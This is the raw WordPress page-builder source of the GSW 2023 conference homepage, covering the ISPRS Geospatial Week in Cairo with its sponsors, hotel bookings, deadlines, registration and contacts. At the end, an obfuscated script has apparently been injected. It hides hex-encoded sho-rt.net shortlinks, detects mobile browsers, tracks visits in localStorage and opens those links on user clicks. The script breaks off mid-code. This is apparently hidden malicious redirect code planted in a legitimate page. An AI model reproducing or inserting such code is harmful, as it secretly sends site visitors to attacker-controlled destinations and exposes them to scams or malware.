/></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 